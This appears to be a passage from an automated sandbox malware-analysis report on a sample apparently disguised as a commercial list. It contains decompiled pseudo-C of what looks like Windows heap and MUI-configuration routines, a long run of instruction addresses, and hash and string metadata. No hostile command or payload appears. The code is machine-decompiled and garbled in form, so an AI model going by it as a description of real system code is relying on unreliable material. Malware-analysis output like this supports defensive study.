								_t453[2] =  *((intOrPtr*)(_t547 + 0x54));
								__eflags = _v20 - _v52 + _v48;
								if(_v20 == _v52 + _v48) {
									__eflags =  *(_t547 + 0x4c);
									if( *(_t547 + 0x4c) != 0) {
										_t453[1] = _t453[1] ^ _t453[0] ^  *_t453;
										 *_t453 =  *_t453 ^  *(_t547 + 0x50);
									}
								} else {
									_t453[3] = 0;
									_t453[1] = 0;
									_t302 = _v24 - _v52 - _v48 + _t509 >> 0x00000003 & 0x0000ffff;
									_t514 = _t302;
									 *_t453 = _t302;
									__eflags =  *0x33446960 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t514 - 1;
										if(_t514 <= 1) {
											_t312 =  *[fs:0x30];
											__eflags =  *(_t312 + 0xc);
											if( *(_t312 + 0xc) == 0) {
												_push("HEAP: ");
												E3334B910();
											} else {
												E3334B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("(LONG)FreeEntry->Size > 1");
											E3334B910();
											__eflags =  *0x33445da8 - _t440; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												L3340FC95(_t440, 1, _t535, 0);
											}
											_t453 = _v36;
										}
									}
									_t453[1] = _t440;
									_t515 =  *((intOrPtr*)(_t535 + 0x18));
									__eflags =  *((intOrPtr*)(_t535 + 0x18)) - _t535;
									if( *((intOrPtr*)(_t535 + 0x18)) != _t535) {
										_t308 = (_t453 - _t535 >> 0x10) + 1;
										_v12 = _t308;
										__eflags = _t308 - 0xfe;
										if(_t308 >= 0xfe) {
											_push(_t440);
											_push(_t440);
											_push(_t535);
											_push(_t453);
											_t461 = 3;
											E33415FED(_t461, _t515);
											_t453 = _v52;
											_t308 = _v28;
										}
									} else {
										_t308 = _t440;
									}
									_t453[3] = _t308;
									E33360B10(_t547, _t453,  *_t453 & 0x0000ffff);
								}
							}
							E3336096B(_t547, _t535, _v48 + 0xffffffe8, _v52, _v44,  &_v8);
							E33360B10(_t547, _v60, _v24);
							_t274 = L33363C40();
							_t536 = 0x7ffe0380;
							__eflags = _t274;
							if(_t274 != 0) {
								_t277 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t277 = 0x7ffe0380;
							}
							__eflags =  *_t277;
							if( *_t277 != 0) {
								_t278 =  *[fs:0x30];
								__eflags =  *(_t278 + 0x240) & 1;
								if(( *(_t278 + 0x240) & 1) != 0) {
									__eflags = L33363C40();
									if(__eflags != 0) {
										_t536 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E3340F058(_t440, _t547, _v48, __eflags, _v52,  *(_t547 + 0x74) << 3, _t440, _t440,  *_t536 & 0x000000ff);
								}
							}
							_t279 = L33363C40();
							_t537 = 0x7ffe038a;
							__eflags = _t279;
							if(_t279 != 0) {
								_t242 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t242 = 0x7ffe038a;
							}
							__eflags =  *_t242;
							if( *_t242 == 0) {
								goto L7;
							} else {
								__eflags = L33363C40();
								if(__eflags != 0) {
									_t537 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									__eflags = _t537;
								}
								_push( *_t537 & 0x000000ff);
								_push(_t440);
								_push(_t440);
								goto L123;
							}
						}
						 *((intOrPtr*)(_t547 + 0x210)) =  *((intOrPtr*)(_t547 + 0x210)) + 1;
						_t323 = E3334FABA( &_v48,  &_v52, 0x4000);
						__eflags = _t323;
						if(_t323 < 0) {
							goto L90;
						}
						_t328 = L33363C40();
						__eflags = _t328;
						if(_t328 != 0) {
							_t331 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						} else {
							_t331 = 0x7ffe0380;
						}
						__eflags =  *_t331;
						if( *_t331 != 0) {
							_t332 =  *[fs:0x30];
							__eflags =  *(_t332 + 0x240) & 1;
							if(( *(_t332 + 0x240) & 1) != 0) {
								E3340F13E(_t439, _t547, _v48, _v52, 6);
							}
						}
						_t509 = _v44;
						goto L31;
					}
					__eflags =  *_v12 - 3;
					if( *_v12 != 3) {
						__eflags = _t265;
						if(_t265 == 0) {
							goto L9;
						}
						__eflags = _t265 -  *((intOrPtr*)(_t547 + 0x6c));
						if(_t265 >=  *((intOrPtr*)(_t547 + 0x6c))) {
							goto L25;
						} else {
							goto L9;
						}
					}
					goto L25;
				}
				_t439 = _a4;
				if(_t439 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t509 = __edx;
					goto L10;
				}
				_t427 =  *((intOrPtr*)(__ecx + 0x74)) + _t439;
				_v20 = _t427;
				if(_t427 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1f8) >>  *((intOrPtr*)(__ecx + 0x250)) + 3) {
					_t509 = _t533;
					goto L9;
				} else {
					_t431 = E33361EB2(__ecx, __edx,  &_a4, 0);
					_t439 = _a4;
					_t509 = _t431;
					_v52 = _t509;
					if(_t439 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E33360B10(__ecx, _t509, _t439);
						_t502 =  *(_t547 + 0x248);
						_t545 =  *((intOrPtr*)(_t547 + 0x1f8)) - ( *(_t547 + 0x74) << 3);
						_t242 = _t502 >> 4;
						if(_t545 < _t502 - _t242) {
							_t504 =  *(_t547 + 0x24c);
							_t242 = _t504 >> 2;
							__eflags = _t545 - _t504 - _t242;
							if(_t545 > _t504 - _t242) {
								_t242 = E3334F6C1(_t547);
								 *(_t547 + 0x24c) = _t545;
								 *(_t547 + 0x248) = _t545;
							}
						}
						goto L7;
					}
				}
			}



















































































                                                                                                                                                                                  0x3334f113
                                                                                                                                                                                  0x3334f120
                                                                                                                                                                                  0x3334f123
                                                                                                                                                                                  0x3334f127
                                                                                                                                                                                  0x3334f137
                                                                                                                                                                                  0x3334f13b
                                                                                                                                                                                  0x333adc64
                                                                                                                                                                                  0x333adc67
                                                                                                                                                                                  0x3334f1d5
                                                                                                                                                                                  0x3334f1d5
                                                                                                                                                                                  0x3334f1c7
                                                                                                                                                                                  0x3334f1cd
                                                                                                                                                                                  0x3334f1cd
                                                                                                                                                                                  0x3334f144
                                                                                                                                                                                  0x333adc75
                                                                                                                                                                                  0x333adc79
                                                                                                                                                                                  0x333adc7b
                                                                                                                                                                                  0x333adc8d
                                                                                                                                                                                  0x333adc92
                                                                                                                                                                                  0x333adc94
                                                                                                                                                                                  0x333adc9a
                                                                                                                                                                                  0x333adc9a
                                                                                                                                                                                  0x333adc9a
                                                                                                                                                                                  0x333adc9a
                                                                                                                                                                                  0x333adc94
                                                                                                                                                                                  0x333adca0
                                                                                                                                                                                  0x333adca3
                                                                                                                                                                                  0x333adca5
                                                                                                                                                                                  0x3334f202
                                                                                                                                                                                  0x3334f202
                                                                                                                                                                                  0x3334f205
                                                                                                                                                                                  0x3334f207
                                                                                                                                                                                  0x333adcae
                                                                                                                                                                                  0x3334f20d
                                                                                                                                                                                  0x3334f21b
                                                                                                                                                                                  0x3334f21b
                                                                                                                                                                                  0x3334f21b
                                                                                                                                                                                  0x3334f228
                                                                                                                                                                                  0x3334f22a
                                                                                                                                                                                  0x3334f22e
                                                                                                                                                                                  0x3334f231
                                                                                                                                                                                  0x3334f23f
                                                                                                                                                                                  0x3334f243
                                                                                                                                                                                  0x3334f248
                                                                                                                                                                                  0x3334f24f
                                                                                                                                                                                  0x3334f256
                                                                                                                                                                                  0x3334f259
                                                                                                                                                                                  0x3334f263
                                                                                                                                                                                  0x3334f269
                                                                                                                                                                                  0x3334f26f
                                                                                                                                                                                  0x3334f275
                                                                                                                                                                                  0x3334f278
                                                                                                                                                                                  0x3334f27d
                                                                                                                                                                                  0x3334f45b
                                                                                                                                                                                  0x3334f461
                                                                                                                                                                                  0x3334f461
                                                                                                                                                                                  0x3334f283
                                                                                                                                                                                  0x3334f28d
                                                                                                                                                                                  0x3334f291
                                                                                                                                                                                  0x3334f292
                                                                                                                                                                                  0x3334f295
                                                                                                                                                                                  0x3334f3be
                                                                                                                                                                                  0x3334f3be
                                                                                                                                                                                  0x3334f3be
                                                                                                                                                                                  0x3334f29d
                                                                                                                                                                                  0x3334f2a1
                                                                                                                                                                                  0x3334f494
                                                                                                                                                                                  0x3334f498
                                                                                                                                                                                  0x3334f49d
                                                                                                                                                                                  0x3334f4a1
                                                                                                                                                                                  0x3334f4a5
                                                                                                                                                                                  0x333adcb5
                                                                                                                                                                                  0x333adcb7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333adcbd
                                                                                                                                                                                  0x3334f4ab
                                                                                                                                                                                  0x3334f4b2
                                                                                                                                                                                  0x333adcc2
                                                                                                                                                                                  0x333adcc4
                                                                                                                                                                                  0x333adcca
                                                                                                                                                                                  0x333adcd0
                                                                                                                                                                                  0x333adcd4
                                                                                                                                                                                  0x333adcf3
                                                                                                                                                                                  0x333adcf8
                                                                                                                                                                                  0x333adcd6
                                                                                                                                                                                  0x333adceb
                                                                                                                                                                                  0x333adcf0
                                                                                                                                                                                  0x333adcfe
                                                                                                                                                                                  0x333add03
                                                                                                                                                                                  0x333add08
                                                                                                                                                                                  0x333add10
                                                                                                                                                                                  0x333add12
                                                                                                                                                                                  0x333add17
                                                                                                                                                                                  0x333add17
                                                                                                                                                                                  0x333add1c
                                                                                                                                                                                  0x333add20
                                                                                                                                                                                  0x333add20
                                                                                                                                                                                  0x333adcc4
                                                                                                                                                                                  0x3334f4b8
                                                                                                                                                                                  0x3334f4be
                                                                                                                                                                                  0x3334f4c1
                                                                                                                                                                                  0x3334f4c5
                                                                                                                                                                                  0x3334f4c7
                                                                                                                                                                                  0x3334f4cb
                                                                                                                                                                                  0x3334f4cd
                                                                                                                                                                                  0x333add28
                                                                                                                                                                                  0x333add28
                                                                                                                                                                                  0x3334f4d9
                                                                                                                                                                                  0x3334f4d9
                                                                                                                                                                                  0x3334f4dd
                                                                                                                                                                                  0x3334f4e1
                                                                                                                                                                                  0x333add30
                                                                                                                                                                                  0x333add37
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333add3d
                                                                                                                                                                                  0x333ae0fe
                                                                                                                                                                                  0x333ae0fe
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ae104
                                                                                                                                                                                  0x333ae10a
                                                                                                                                                                                  0x333ae10e
                                                                                                                                                                                  0x333ae12d
                                                                                                                                                                                  0x333ae132
                                                                                                                                                                                  0x333ae110
                                                                                                                                                                                  0x333ae125
                                                                                                                                                                                  0x333ae12a
                                                                                                                                                                                  0x333ae138
                                                                                                                                                                                  0x333ae13d
                                                                                                                                                                                  0x333ae142
                                                                                                                                                                                  0x333ae14a
                                                                                                                                                                                  0x333ae14c
                                                                                                                                                                                  0x333ae151
                                                                                                                                                                                  0x333ae151
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334f4e7
                                                                                                                                                                                  0x3334f4f5
                                                                                                                                                                                  0x3334f4fa
                                                                                                                                                                                  0x3334f4fc
                                                                                                                                                                                  0x333add44
                                                                                                                                                                                  0x333add44
                                                                                                                                                                                  0x333add4a
                                                                                                                                                                                  0x333add4f
                                                                                                                                                                                  0x333ae159
                                                                                                                                                                                  0x333ae159
                                                                                                                                                                                  0x3334f1d2
                                                                                                                                                                                  0x3334f1d2
                                                                                                                                                                                  0x3334f1d4
                                                                                                                                                                                  0x3334f1d4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334f1d4
                                                                                                                                                                                  0x333add6d
                                                                                                                                                                                  0x333ae156
                                                                                                                                                                                  0x333ae156
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ae156
                                                                                                                                                                                  0x3334f502
                                                                                                                                                                                  0x3334f507
                                                                                                                                                                                  0x3334f50c
                                                                                                                                                                                  0x3334f50e
                                                                                                                                                                                  0x333add80
                                                                                                                                                                                  0x3334f514
                                                                                                                                                                                  0x3334f514
                                                                                                                                                                                  0x3334f514
                                                                                                                                                                                  0x3334f516
                                                                                                                                                                                  0x3334f519
                                                                                                                                                                                  0x333add8a
                                                                                                                                                                                  0x333add90
                                                                                                                                                                                  0x333add97
                                                                                                                                                                                  0x333adda9
                                                                                                                                                                                  0x333adda9
                                                                                                                                                                                  0x333add97
                                                                                                                                                                                  0x3334f51f
                                                                                                                                                                                  0x3334f523
                                                                                                                                                                                  0x3334f529
                                                                                                                                                                                  0x3334f52c
                                                                                                                                                                                  0x3334f532
                                                                                                                                                                                  0x333addb3
                                                                                                                                                                                  0x333addb3
                                                                                                                                                                                  0x3334f53c
                                                                                                                                                                                  0x3334f541
                                                                                                                                                                                  0x3334f54b
                                                                                                                                                                                  0x3334f550
                                                                                                                                                                                  0x3334f55c
                                                                                                                                                                                  0x3334f563
                                                                                                                                                                                  0x3334f56d
                                                                                                                                                                                  0x3334f570
                                                                                                                                                                                  0x3334f575
                                                                                                                                                                                  0x3334f577
                                                                                                                                                                                  0x3334f577
                                                                                                                                                                                  0x3334f577
                                                                                                                                                                                  0x3334f577
                                                                                                                                                                                  0x3334f57d
                                                                                                                                                                                  0x3334f582
                                                                                                                                                                                  0x333addc2
                                                                                                                                                                                  0x333addca
                                                                                                                                                                                  0x333addce
                                                                                                                                                                                  0x333addda
                                                                                                                                                                                  0x333addde
                                                                                                                                                                                  0x333adeaf
                                                                                                                                                                                  0x333adeb3
                                                                                                                                                                                  0x333adec1
                                                                                                                                                                                  0x333adec7
                                                                                                                                                                                  0x333adec7
                                                                                                                                                                                  0x333adde4
                                                                                                                                                                                  0x333adde8
                                                                                                                                                                                  0x333addea
                                                                                                                                                                                  0x333added
                                                                                                                                                                                  0x333addf7
                                                                                                                                                                                  0x333addfa
                                                                                                                                                                                  0x333addfc
                                                                                                                                                                                  0x333ade02
                                                                                                                                                                                  0x333ade08
                                                                                                                                                                                  0x333ade0a
                                                                                                                                                                                  0x333ade0d
                                                                                                                                                                                  0x333ade0f
                                                                                                                                                                                  0x333ade15
                                                                                                                                                                                  0x333ade18
                                                                                                                                                                                  0x333ade37
                                                                                                                                                                                  0x333ade3c
                                                                                                                                                                                  0x333ade1a
                                                                                                                                                                                  0x333ade2f
                                                                                                                                                                                  0x333ade34
                                                                                                                                                                                  0x333ade42
                                                                                                                                                                                  0x333ade47
                                                                                                                                                                                  0x333ade4d
                                                                                                                                                                                  0x333ade53
                                                                                                                                                                                  0x333ade55
                                                                                                                                                                                  0x333ade5a
                                                                                                                                                                                  0x333ade5a
                                                                                                                                                                                  0x333ade5f
                                                                                                                                                                                  0x333ade5f
                                                                                                                                                                                  0x333ade0d
                                                                                                                                                                                  0x333ade63
                                                                                                                                                                                  0x333ade66
                                                                                                                                                                                  0x333ade69
                                                                                                                                                                                  0x333ade72
                                                                                                                                                                                  0x333ade73
                                                                                                                                                                                  0x333ade77
                                                                                                                                                                                  0x333ade7c
                                                                                                                                                                                  0x333ade7e
                                                                                                                                                                                  0x333ade7f
                                                                                                                                                                                  0x333ade80
                                                                                                                                                                                  0x333ade81
                                                                                                                                                                                  0x333ade87
                                                                                                                                                                                  0x333ade88
                                                                                                                                                                                  0x333ade8d
                                                                                                                                                                                  0x333ade91
                                                                                                                                                                                  0x333ade91
                                                                                                                                                                                  0x333ade95
                                                                                                                                                                                  0x333ade95
                                                                                                                                                                                  0x333ade9d
                                                                                                                                                                                  0x333adea0
                                                                                                                                                                                  0x333adea5
                                                                                                                                                                                  0x333adea5
                                                                                                                                                                                  0x333addde
                                                                                                                                                                                  0x3334f588
                                                                                                                                                                                  0x3334f58d
                                                                                                                                                                                  0x3334f58f
                                                                                                                                                                                  0x333aded7
                                                                                                                                                                                  0x3334f595
                                                                                                                                                                                  0x3334f595
                                                                                                                                                                                  0x3334f595
                                                                                                                                                                                  0x3334f597
                                                                                                                                                                                  0x3334f59a
                                                                                                                                                                                  0x333adee1
                                                                                                                                                                                  0x333adeea
                                                                                                                                                                                  0x333adef0
                                                                                                                                                                                  0x333adefb
                                                                                                                                                                                  0x333adefd
                                                                                                                                                                                  0x333adf08
                                                                                                                                                                                  0x333adf08
                                                                                                                                                                                  0x333adf08
                                                                                                                                                                                  0x333adf2b
                                                                                                                                                                                  0x333adf2b
                                                                                                                                                                                  0x333adef0
                                                                                                                                                                                  0x3334f5a0
                                                                                                                                                                                  0x3334f5a5
                                                                                                                                                                                  0x3334f5aa
                                                                                                                                                                                  0x3334f5af
                                                                                                                                                                                  0x3334f5b1
                                                                                                                                                                                  0x333adf3e
                                                                                                                                                                                  0x3334f5b7
                                                                                                                                                                                  0x3334f5b7
                                                                                                                                                                                  0x3334f5b7
                                                                                                                                                                                  0x3334f5b9
                                                                                                                                                                                  0x3334f5bc
                                                                                                                                                                                  0x333adf4a
                                                                                                                                                                                  0x333adf4c
                                                                                                                                                                                  0x333adf57
                                                                                                                                                                                  0x333adf57
                                                                                                                                                                                  0x333adf57
                                                                                                                                                                                  0x333adf5c
                                                                                                                                                                                  0x333adf5d
                                                                                                                                                                                  0x333adf61
                                                                                                                                                                                  0x333adf7c
                                                                                                                                                                                  0x333adf88
                                                                                                                                                                                  0x333adf89
                                                                                                                                                                                  0x333adf8d
                                                                                                                                                                                  0x333adf8d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334f5bc
                                                                                                                                                                                  0x3334f4e1
                                                                                                                                                                                  0x3334f2a7
                                                                                                                                                                                  0x3334f2ad
                                                                                                                                                                                  0x3334f2b6
                                                                                                                                                                                  0x3334f2ba
                                                                                                                                                                                  0x3334f2bc
                                                                                                                                                                                  0x333adf97
                                                                                                                                                                                  0x333adf9d
                                                                                                                                                                                  0x333adf9d
                                                                                                                                                                                  0x3334f2c4
                                                                                                                                                                                  0x3334f2c7
                                                                                                                                                                                  0x3334f2cb
                                                                                                                                                                                  0x3334f2cd
                                                                                                                                                                                  0x3334f2d2
                                                                                                                                                                                  0x3334f2d6
                                                                                                                                                                                  0x3334f3c8
                                                                                                                                                                                  0x3334f3c8
                                                                                                                                                                                  0x3334f2dc
                                                                                                                                                                                  0x3334f2e1
                                                                                                                                                                                  0x3334f2e3
                                                                                                                                                                                  0x333ae0ed
                                                                                                                                                                                  0x333ae0f3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ae0f9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ae0f9
                                                                                                                                                                                  0x3334f2e9
                                                                                                                                                                                  0x3334f2eb
                                                                                                                                                                                  0x3334f2ef
                                                                                                                                                                                  0x3334f2f3
                                                                                                                                                                                  0x3334f302
                                                                                                                                                                                  0x3334f302
                                                                                                                                                                                  0x3334f304
                                                                                                                                                                                  0x3334f346
                                                                                                                                                                                  0x3334f346
                                                                                                                                                                                  0x3334f348
                                                                                                                                                                                  0x3334f34c
                                                                                                                                                                                  0x3334f3ea
                                                                                                                                                                                  0x3334f3f2
                                                                                                                                                                                  0x3334f3f6
                                                                                                                                                                                  0x3334f402
                                                                                                                                                                                  0x3334f406
                                                                                                                                                                                  0x333ae046
                                                                                                                                                                                  0x333ae049
                                                                                                                                                                                  0x333ae057
                                                                                                                                                                                  0x333ae05d
                                                                                                                                                                                  0x333ae05d
                                                                                                                                                                                  0x3334f40c
                                                                                                                                                                                  0x3334f410
                                                                                                                                                                                  0x3334f413
                                                                                                                                                                                  0x3334f423
                                                                                                                                                                                  0x3334f426
                                                                                                                                                                                  0x3334f428
                                                                                                                                                                                  0x3334f42e
                                                                                                                                                                                  0x3334f434
                                                                                                                                                                                  0x333adfe4
                                                                                                                                                                                  0x333adfe7
                                                                                                                                                                                  0x333adfed
                                                                                                                                                                                  0x333adff3
                                                                                                                                                                                  0x333adff6
                                                                                                                                                                                  0x333ae015
                                                                                                                                                                                  0x333ae01a
                                                                                                                                                                                  0x333adff8
                                                                                                                                                                                  0x333ae00d
                                                                                                                                                                                  0x333ae012
                                                                                                                                                                                  0x333ae020
                                                                                                                                                                                  0x333ae025
                                                                                                                                                                                  0x333ae02b
                                                                                                                                                                                  0x333ae031
                                                                                                                                                                                  0x333ae033
                                                                                                                                                                                  0x333ae038
                                                                                                                                                                                  0x333ae038
                                                                                                                                                                                  0x333ae03d
                                                                                                                                                                                  0x333ae03d
                                                                                                                                                                                  0x333adfe7
                                                                                                                                                                                  0x3334f43a
                                                                                                                                                                                  0x3334f43d
                                                                                                                                                                                  0x3334f440
                                                                                                                                                                                  0x3334f442
                                                                                                                                                                                  0x3334f470
                                                                                                                                                                                  0x3334f471
                                                                                                                                                                                  0x3334f475
                                                                                                                                                                                  0x3334f47a
                                                                                                                                                                                  0x3334f47c
                                                                                                                                                                                  0x3334f47d
                                                                                                                                                                                  0x3334f47e
                                                                                                                                                                                  0x3334f47f
                                                                                                                                                                                  0x3334f482
                                                                                                                                                                                  0x3334f483
                                                                                                                                                                                  0x3334f488
                                                                                                                                                                                  0x3334f48c
                                                                                                                                                                                  0x3334f48c
                                                                                                                                                                                  0x3334f444
                                                                                                                                                                                  0x3334f444
                                                                                                                                                                                  0x3334f444
                                                                                                                                                                                  0x3334f446
                                                                                                                                                                                  0x3334f451
                                                                                                                                                                                  0x3334f451
                                                                                                                                                                                  0x3334f406
                                                                                                                                                                                  0x3334f36b
                                                                                                                                                                                  0x3334f37a
                                                                                                                                                                                  0x3334f37f
                                                                                                                                                                                  0x3334f384
                                                                                                                                                                                  0x3334f389
                                                                                                                                                                                  0x3334f38b
                                                                                                                                                                                  0x333ae06d
                                                                                                                                                                                  0x3334f391
                                                                                                                                                                                  0x3334f391
                                                                                                                                                                                  0x3334f391
                                                                                                                                                                                  0x3334f393
                                                                                                                                                                                  0x3334f396
                                                                                                                                                                                  0x333ae077
                                                                                                                                                                                  0x333ae080
                                                                                                                                                                                  0x333ae086
                                                                                                                                                                                  0x333ae091
                                                                                                                                                                                  0x333ae093
                                                                                                                                                                                  0x333ae09e
                                                                                                                                                                                  0x333ae09e
                                                                                                                                                                                  0x333ae09e
                                                                                                                                                                                  0x333ae0bb
                                                                                                                                                                                  0x333ae0bb
                                                                                                                                                                                  0x333ae086
                                                                                                                                                                                  0x3334f39c
                                                                                                                                                                                  0x3334f3a1
                                                                                                                                                                                  0x3334f3a6
                                                                                                                                                                                  0x3334f3a8
                                                                                                                                                                                  0x333ae0ce
                                                                                                                                                                                  0x3334f3ae
                                                                                                                                                                                  0x3334f3ae
                                                                                                                                                                                  0x3334f3ae
                                                                                                                                                                                  0x3334f3b0
                                                                                                                                                                                  0x3334f3b3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334f3b9
                                                                                                                                                                                  0x333ae0dd
                                                                                                                                                                                  0x333ae0df
                                                                                                                                                                                  0x333adf70
                                                                                                                                                                                  0x333adf70
                                                                                                                                                                                  0x333adf70
                                                                                                                                                                                  0x333adf79
                                                                                                                                                                                  0x333adf7a
                                                                                                                                                                                  0x333adf7b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333adf7b
                                                                                                                                                                                  0x3334f3b3
                                                                                                                                                                                  0x3334f306
                                                                                                                                                                                  0x3334f31a
                                                                                                                                                                                  0x3334f31f
                                                                                                                                                                                  0x3334f321
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334f327
                                                                                                                                                                                  0x3334f32c
                                                                                                                                                                                  0x3334f32e
                                                                                                                                                                                  0x333adfaf
                                                                                                                                                                                  0x3334f334
                                                                                                                                                                                  0x3334f334
                                                                                                                                                                                  0x3334f334
                                                                                                                                                                                  0x3334f339
                                                                                                                                                                                  0x3334f33c
                                                                                                                                                                                  0x333adfb9
                                                                                                                                                                                  0x333adfc2
                                                                                                                                                                                  0x333adfc8
                                                                                                                                                                                  0x333adfda
                                                                                                                                                                                  0x333adfda
                                                                                                                                                                                  0x333adfc8
                                                                                                                                                                                  0x3334f342
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334f342
                                                                                                                                                                                  0x3334f2f9
                                                                                                                                                                                  0x3334f2fc
                                                                                                                                                                                  0x3334f3d0
                                                                                                                                                                                  0x3334f3d2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334f3d8
                                                                                                                                                                                  0x3334f3db
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334f3e1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334f3e1
                                                                                                                                                                                  0x3334f3db
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334f2fc
                                                                                                                                                                                  0x3334f14a
                                                                                                                                                                                  0x3334f150
                                                                                                                                                                                  0x333adc6e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333adc6e
                                                                                                                                                                                  0x3334f159
                                                                                                                                                                                  0x3334f15b
                                                                                                                                                                                  0x3334f162
                                                                                                                                                                                  0x3334f1d0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334f17b
                                                                                                                                                                                  0x3334f184
                                                                                                                                                                                  0x3334f189
                                                                                                                                                                                  0x3334f18c
                                                                                                                                                                                  0x3334f18e
                                                                                                                                                                                  0x3334f19e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334f1a0
                                                                                                                                                                                  0x3334f1a3
                                                                                                                                                                                  0x3334f1b1
                                                                                                                                                                                  0x3334f1ba
                                                                                                                                                                                  0x3334f1be
                                                                                                                                                                                  0x3334f1c5
                                                                                                                                                                                  0x3334f1dc
                                                                                                                                                                                  0x3334f1e4
                                                                                                                                                                                  0x3334f1e9
                                                                                                                                                                                  0x3334f1eb
                                                                                                                                                                                  0x3334f1ef
                                                                                                                                                                                  0x3334f1f4
                                                                                                                                                                                  0x3334f1fa
                                                                                                                                                                                  0x3334f1fa
                                                                                                                                                                                  0x3334f1eb
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334f1c5
                                                                                                                                                                                  0x3334f19e

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                  • API String ID: 0-523794902
                                                                                                                                                                                  • Opcode ID: 44babd5242638e266fa7d76cf004668b1af96ba5ced76ab1b2f3ea221d37934f
                                                                                                                                                                                  • Instruction ID: e7fb0048693f921d72e4eff166876c837981546045dc23bcaa5ac070f0a99a96
                                                                                                                                                                                  • Opcode Fuzzy Hash: 44babd5242638e266fa7d76cf004668b1af96ba5ced76ab1b2f3ea221d37934f
                                                                                                                                                                                  • Instruction Fuzzy Hash: A542EE75A083819FE305CF28C890A2ABBE9FF88744F08CA6DE495CB751DB34D941CB52
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3337510F Relevance: 7.9, Strings: 6, Instructions: 434COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                                                                  			E3337510F(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E33378BD1(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E33378BD1(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
